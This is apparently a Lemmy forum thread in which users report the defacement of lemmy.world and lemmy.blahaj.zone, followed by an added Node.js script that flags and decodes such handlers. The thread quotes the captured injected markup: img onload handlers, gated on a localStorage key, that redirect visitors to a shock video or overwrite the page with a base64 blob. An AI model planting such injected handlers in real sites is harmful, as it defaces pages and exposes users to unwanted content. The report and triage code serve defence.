Originally this post was me saying “oh, they refederated us.” They didn’t, they got hacked, lol. We’ve temporarily defederated with lemmy.world on our end (not that they federated with us anyway) until they get their shit back.

    • Disa@burggit.moe (OP, M) · 3 upvotes · 1 year ago

      They seem to have changed what happens a couple times.

      I’ll refederate them once they make an announcement post or once their sidebar changes from this:

          • RA2lover@burggit.moe · 3 upvotes · edited · 1 year ago

            aaaand it’s compromised again. at least this time i was able to get the website’s payload before a redirect hit.

            EDIT: sidebar has an onload component changing the window location if an item “h” can’t be found on the browser’s local storage:

            onload="if(localStorage.getItem(`h`) != `true`){window.location.href = `https://lemmy.world/pictrs/image/7aa772b7-9416-45d1-805b-36ec21be9f66.mp4`}"
            

            edit2: their backend is now down.

    • Burger@burggit.moe · 3 upvotes · 1 year ago

      I suspect we aren’t high on the targets list. This looks like it’s coming from the edgy part of fedi and we have really relaxed rules here, and we aren’t talking about how “le nazis are at every corner and that it’s only a matter of time until they take over!!1111!!!” every 5s.

      • burger_alt@burggit.moe · 3 upvotes · edited · 1 year ago

        In any case, alt created so that I won’t risk my admin user’s session getting hijacked. Sanitize your strings, people.

  • RA2lover@burggit.moe · 2 upvotes · edited · 1 year ago

    lemmy.blahaj.zone has also been defaced. edit: it’s not the sidebar this time. the localstorage backdoor suggests it’s the same actor.

    <div class="mt-4 p-0 fl-1"><div tabIndex="-1"><div class="home container-lg"><!--!--><div class="row"><main class="col-12 col-md-8 col-lg-9" role="main"><div id="tagline"><p><img class="icon icon-emoji" src="https://blahaj.zone/files/660c5387-e0f4-4dc3-aa31-2c7e90c86b20" title="ohno" alt="" onload="if(localStorage.getItem(`h`) != `true`){document.body.innerHTML = atob(`PGlmcmFtZSB3aWR0aD0iNTYwIiBoZWlnaHQ9IjMxNSIgc3JjPSJodHRwczovL3d3dy55b3V0dWJlLmNvbS9lbWJlZC9aMUs0QlV0SHNPNCIgdGl0bGU9IllvdVR1YmUgdmlkZW8gcGxheWVyIiBmcmFtZWJvcmRlcj0iMCIgYWxsb3c9ImFjY2VsZXJvbWV0ZXI7IGF1dG9wbGF5OyBjbGlwYm9hcmQtd3JpdGU7IGVuY3J5cHRlZC1tZWRpYTsgZ3lyb3Njb3BlOyBwaWN0dXJlLWluLXBpY3R1cmU7IHdlYi1zaGFyZSIgYWxsb3dmdWxsc2NyZWVuPjwvaWZyYW1lPg==`)}""/></p>
    

    blob decodes to

    '<iframe width="560" height="315" src="https://www.youtube.com/embed/Z1K4BUtHsO4" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe>'
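
Added example, not part of the thread or any poster's code: a small Node.js triage helper that lists inline `on*` handlers in a captured page, reports the `localStorage` key they gate on and any redirect target, and decodes `atob()` blobs the way the comment above did by hand. The function name, regexes and sample markup are assumptions constructed for illustration; the sample uses `example.invalid` placeholders rather than the URLs quoted in the thread.

```javascript
// Triage helper: list inline event handlers in captured HTML and decode atob() blobs.
// All names are hypothetical; the sample markup below is constructed for this example.
const HANDLER_RE = /\s(on[a-z]+)\s*=\s*"([^"]*)"/gi; // on*="..." attributes
const ATOB_RE = /atob\(\s*[`'"]([A-Za-z0-9+\/=]+)[`'"]\s*\)/g;
const GATE_RE = /localStorage\.getItem\(\s*[`'"]([^`'"]+)[`'"]\s*\)/;
const REDIRECT_RE = /location(?:\.href)?\s*=\s*[`'"]([^`'"]+)[`'"]/;

function triageInlineHandlers(html) {
  const findings = [];
  for (const m of html.matchAll(HANDLER_RE)) {
    const [, attr, code] = m;
    const gate = code.match(GATE_RE);
    const redirect = code.match(REDIRECT_RE);
    findings.push({
      attr: attr.toLowerCase(),
      // Key the handler checks before firing (the thread's payloads used `h`).
      localStorageKey: gate ? gate[1] : null,
      // Where the handler sends the browser, if it assigns window.location.
      redirectTarget: redirect ? redirect[1] : null,
      // Base64 blobs are decoded to text only; nothing is rendered or executed.
      decodedBlobs: [...code.matchAll(ATOB_RE)].map(
        (b) => Buffer.from(b[1], 'base64').toString('utf8')),
    });
  }
  return findings;
}

// Constructed sample: one handler replaces the page body, one redirects.
const blob = Buffer.from('<b>constructed</b>').toString('base64');
const SAMPLE_HTML =
  '<p><img src="https://example.invalid/a.png" alt="" ' +
  'onload="if(localStorage.getItem(`h`) != `true`)' +
  '{document.body.innerHTML = atob(`' + blob + '`)}"/>' +
  '<img src="https://example.invalid/b.png" ' +
  'onload="if(localStorage.getItem(`h`) != `true`)' +
  '{window.location.href = `https://example.invalid/x.mp4`}"/></p>';

for (const f of triageInlineHandlers(SAMPLE_HTML)) console.log(f);
```

Both handler shapes only run because the page permits inline script; a Content-Security-Policy whose `script-src` omits `'unsafe-inline'` blocks inline event handlers like these even when the markup gets through.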
    
    • Burger@burggit.moe · 6 upvotes · 1 year ago

      They make it abundantly clear tbf since it redirects you to lemonparty if you access any of their pages.

      Not sure what mechanism does it, though. Since it lets me access a thread momentarily and then a few seconds later the redirect kicks on.

      Anyways, mfw this happened to an instance that defederated us: